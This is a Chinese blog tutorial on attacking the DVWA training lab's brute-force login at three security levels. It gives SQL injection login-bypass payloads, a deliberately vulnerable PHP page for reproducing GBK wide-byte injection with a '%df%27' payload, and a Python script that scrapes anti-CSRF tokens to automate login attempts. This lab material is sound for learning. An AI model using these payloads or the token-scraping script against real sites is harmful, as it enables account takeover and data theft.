DVWA——改GBK尝试宽字节注入(brute教程)

最新推荐文章于 2024-05-07 18:56:37 发布
最新推荐文章于 2024-05-07 18:56:37 发布
阅读量498 收藏
点赞数 1
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108376944
版权

DVWA教程——爆破brute force

1、low等级

ps:加入echo $query 方便测试
输入admin/admin,查看$query结果

SELECT * FROM `users` WHERE user = 'admin' AND password = '21232f297a57a5a743894a0e4a801fc3'; 

// Get username
    $user = $_GET[ 'username' ];
    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );
$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

没有对GET提交的username、password进行任何过滤,直接带入数据库进行查询,可进行注入
payload:
?username=admin’%23&password=&Login=Login

SELECT * FROM `users` WHERE user = 'admin'#' AND password = 'd41d8cd98f00b204e9800998ecf8427e';

?username=admin%27–+%2B&password=&Login=Login

SELECT * FROM `users` WHERE user = 'admin'-- +' AND password = 'd41d8cd98f00b204e9800998ecf8427e';

使用burp的intruder功能对密码进行爆破
在这里插入图片描述
在这里插入图片描述

2、medium等级

<?php
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    echo $query;

mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。查看转义效果:

SELECT * FROM `users` WHERE user = 'admin\'*/\"' AND password = 'c4ca4238a0b923820dcc509a6f75849b';

语法:

mysqli_real_escape_string(connection,escapestring);
参数描述
connection必需。规定要使用的 MySQL 连接。
escapestring必需。要转义的字符串。编码的字符是 NUL(ASCII 0)、\n、\r、\、’、" 和 Control-Z。

过滤的单引号、双引号不能注入,那就用burpsuite进行爆破,方法与前面相同

宽字节注入绕过

据说如果mysql的默认编码为GBK,可以绕过mysqli_real_escape_string/addslashes函数的过滤,自己修改下mysql设置,编写php代码测试一下
addslashes函数的语法:

addslashes ( string $str ) : string

addslashes函数的作用:
返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(’)、双引号(")、反斜线(\)与 NUL(NULL 字符)。

(1)修改mysql默认编码设置

参考教程:MySql5.7.18字符集配置图文实例分享

我用的是phpstudy2018版,mysql版本为5.5.53,用命令修改编码不能成功,直接从my.ini下手

[client]
#default-character-set=utf8mb4
default-character-set=gbk
port=3306
[mysql]
#default-character-set=utf8mb4
default-character-set=gbk

phpstudy2018的mysqld下不能设置default-character-set=gbk,否则无法重新启动mysql,测试phpstudy2016发现改my.ini也没有用。

修改后查看默认编码

show variables like "%character_set_%";

在这里插入图片描述
修改dvwa数据库的默认编码
alter database dvwa character set gbk;
查看修改结果:
show create database dvwa;
在这里插入图片描述
同理修改数据表user的默认编码
alter table ‘users’ default character set gbk;
查看修改结果:
show create table users;在这里插入图片描述
将medium.php单独拿出来,修改部分代码可以实现宽字节注入本地复现,在medium.php前两行加入下面代码测试宽字节注入:
注意:将该文件放在根目录下测试才能成功

$GLOBALS["___mysqli_ston"]=mysqli_connect('127.0.0.1','root','root','dvwa',3306);
mysqli_query($GLOBALS["___mysqli_ston"],  "SET NAMES 'gbk'" );
(2)编写测试代码

宽字节注入原理及本地复现参考教程:Hr-Papers|宽字节注入深度讲解
使用dvwa数据库编写测试代码:

<?php
//连接数据库部分,注意使用了gbk编码
header('Content-Type:text/html;charset=gb2312');
 $conn = mysqli_connect('localhost', 'root', 'root','dvwa') or die('bad!');
 mysqli_query($conn,"SET NAMES 'gbk'");

 //执行sql语句
 $user = isset($_GET['user']) ? addslashes($_GET['user']) : 'admin';
 //$user = isset($_GET['user']) ? mysqli_real_escape_string($conn,$_GET['user']) : 'admin';
 $sql = "SELECT * FROM users WHERE user='{$user}'";
 echo $sql;
 echo "\n";
 $result = mysqli_query($conn,$sql) or die(mysqli_error($conn));
?>
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<title>宽字节测试</title>
</head>
 <?php
if( $result && mysqli_num_rows( $result ) == 1 ){
    $row = mysqli_fetch_array($result, MYSQLI_ASSOC);
    echo "<h2>{$row['user']}</h2><p>{$row['password']}<p>\n";
}
else{
    echo "<p>"."user or password error!"."<p>\n";
}
mysqli_close($conn);
?>
</body>
</html>

payload:
?user=admin%df%27%20–%20+
使用mysqli_real_escape_string过滤的结果:
在这里插入图片描述
使用addslashes过滤的结果:
在这里插入图片描述

3、high等级

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();
?>

新增token校验和stripslashes()函数过滤

stripslashes定义和用法
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
提示:该函数可用于清理从数据库中或者从 HTML 表单中取回的数据。
没有趁手的工具,自己来用python来爆破一波

获取token脚本
#coding:utf-8
import requests
import re

url='http://192.168.78.1/dvwa/vulnerabilities/brute/'
headers={
"Host":"192.168.78.1",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding":"gzip, deflate",
"Referer":"http://192.168.78.1/dvwa/security.php",
"Connection":"keep-alive",
"Cookie":"security=high; PHPSESSID=ke27qaiipg1rghvda1hgu4td86",
"Upgrade-Insecure-Requests":"1",
"Cache-Control":"max-age=0"
}
s=requests.session()
res=s.get(url=url,headers=headers,timeout=10)
# print(res.text)
html_res=res.text
pattern=r'\Suser_token\S\svalue=\S(.*)\S\s/>'
p=re.compile(pattern)
user_token=p.findall(html_res)[0]
print(user_token)
user='admin'
pwd='password'
params={'username':user,'password':pwd,'Login':'Login','user_token':user_token}
bruteres=s.get(url=url,headers=headers,params=params,timeout=10)
print(len(bruteres.text))
print(bruteres.text)

这里没有加载字典进行爆破,只用了正确的账号密码进行了登陆,关键在获取token,相关加载字典爆破代码可以参照我另一篇文章《Python 验证码 crunch|狼组CTF题 有验证码后台账号密码爆破》

tempulcc
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
宽字节注入
weixin_45253622的博客
03-18 6480
宽字节注入 漏洞原理 宽字节注入是由于不同编码中中英文所占字符的不同所导致的。 通常来说,在GBK编码当中,一个汉字占用2个字节。而UTF-8编码中,一个汉字占用3个字节。 在一般的sql注入时,参数id=1在数据库查询时是被单引号包围的。当传入id=1’时,传入的单引号又被转义符(反斜线)转义,导致参数ID无法逃逸单引号的包围,所以在一般情况下,此处是不存在sql注入漏洞的。 不过有个特例,就是当数据库的编码是GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df ,再加单引号,因为反斜杠的编
给textarea增加长度限制的几种方法
热门推荐
编程手札
05-28 1万+
最简单的:=20){event.returnValue=false}>aaaa简单有效,但问题是输入20个字符后边删除键、光标键通通失效,未够20个字符时粘贴一段长文字也可以突破限制。 最粗暴的:  function isMaxLen(o){   var nMaxLen=o.getAttribute? parseInt(o.getAttribute("maxlength")):"
盲注、报错注入、宽字节注入、堆叠注入学习笔记
qq_42562304的博客
06-15 592
基于布尔的盲注: 传入“”错误“”参数和“正确”参数,观察页面是否发生了变化。 基于时间的盲注: 有些数据库对错误信息做了安全配置,是的无法通过以上方式(即页面返回的真假)探测注入点。此时,可以通过设置sleep语句(延迟多长时间,判断后台执行的时间)来探测注入点,称为基于时间的盲注。 补充函数: ASCII码对照表: 判断DVWA靶场盲注这关的库名: 可以判断为基于布尔的盲注。以下为通过ascii函数爆库名: 说明库的第一个字符ascci码为100,查表后得到第一个字符为d。重复以上步骤,可以得出当前
2024年黑客入门教程从零基础入门到精通,看完这一篇就够了(1),满满干货指导
最新发布
2401_84297796的博客
05-07 650
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
DVWA命令注入出现乱码解决方法
zonei123的博客
01-28 1324
出现乱码 解决方法: 找到dvwaPage.inc.php 把字符集编码utf-8为GB2312 完美解决
DVWA------XSS(全)
m0_65712192的博客
12-13 5213
DVWA-----XSS(全)
DVWA之SQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
win10 DVWA下载安装配置图文教程详解(新手学渗透)
01-11
电脑重装系统了,需要重新装一下渗透测试的学习环境DVWA,借此机会就跟大家讲一下DVWA的安装过程,因为不同的电脑配置、环境不同,在我的电脑上按照我这个安装教程是一次性就安装好了的。如果安装的时候遇到了什么...
DVWA全级别教程
10-26
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
DVWA_bruteForce工具_官网下载_Bruter_1.1.zip
09-18
DVWABruteForce板块所需要用到的暴力破解工具。 日常暴力破解小能手。谁用谁知道。
DVWA下的SQL注入
07-25
### DVWA下的SQL注入知识点详解 #### 一、SQL注入基础概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过这种手段将恶意SQL代码插入到应用程序的查询中,以达到非法访问或篡数据的目的。在本篇内容中...
DVWA学习之XSS
千寻的博客
01-02 483
DVWA学习之XSS 反射性XSS Low等级 【】 Medium等级 双写绕过: 【<scr 大小写绕过 【】 High等级 【] []当点击键盘任意一个按键的时候触发。 Impossible等级 存储型XSS Low等级 trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符,预定义字符包括、\t、\n、\x0B、\r以及空格,可选参...
宽字节注入详解
xyx107的博客
08-11 5184
尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,所以出了gbk和utf-8两个版本。 我们就以gbk字符编码为示范,拉开帷幕。gbk是一种多字符编码,具体定义自行百度。但有一个地方尤其要...
SQL Injection6(宽字节注入)
kid的博客
05-08 852
SQL Injection6(宽字节注入) 前言 前面sql注入时最怕碰到的就是字符型注入,然后’被过滤,反正当时时没有什么办法解决,但宽字节注入给这样的情况带来了希望 宽字节注入原理 首先是编码,之所以产生宽字节注入,就是因为有不同的编码方式 因为php后端会对我们的输入进行转义,转义的方式通常是加上’\’, 比如 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串(预定义字符...
sql宽字节注入详解
Pz_mstr's Blog
10-12 3907
转载大牛离别歌的文章:https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型
宽字节注入实例
七月_的博客
08-09 2100
http://103.238.227.13:10083/?id=1 我们看一下html源码 看到编码变化了 所以是宽字节注入   所以我们要用%df来代替一个字节 http://103.238.227.13:10083/?id=1%df   页面正确 加个单引号页面报错 http://103.238.227.13:10083/?id=1%df’ 页面报错 存在注入  ...
DVWA之命令注入
qq_36915061的博客
11-28 327
LOW 最简单的命令注入型似SQL注入,即在一个命令的后面添加非法输入,导致服务器执行正常语句的同时,也执行的后面的入侵语句. 例如,该条命令为ping,需要输入ip地址,127.0.0.1为正常输入,后面的& ls为非法输入 low级别的命令注入由于无任何过滤,所以简单的将入侵语句连接在正常语句后即可. 语句连接方式: A & B 前一个命令先执行不论是否...
有趣的注入(宽字节注入
xiao白帽子学习之路
12-03 2690
ctf:有趣的注入 url:http://ctf.cdusec.org:8086/sqli.php?id=1 实验工具:火狐hackbar x001: 输入:” ‘ “单引号无反应,再输入&amp;quot; %df’ &amp;quot;(宽字节注入,显示报错。) 截图: x002判断列数:判断出来有3列。 http://ctf.cdusec.org:8086/sqli.php?id=1%df' order by 2 -- +...
DVWA 1.9 SQL注入详解:新手教程与实战步骤
"这篇教程主要关注SQL注入漏洞的讲解,基于最新版本的DVWA 1.9,并提供了针对新手的教程DVWA是一个用于安全脆弱性评估的PHP/MySQL Web应用,具有多个安全级别,包括Low、Medium、High和Impossible。文章介绍了SQL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值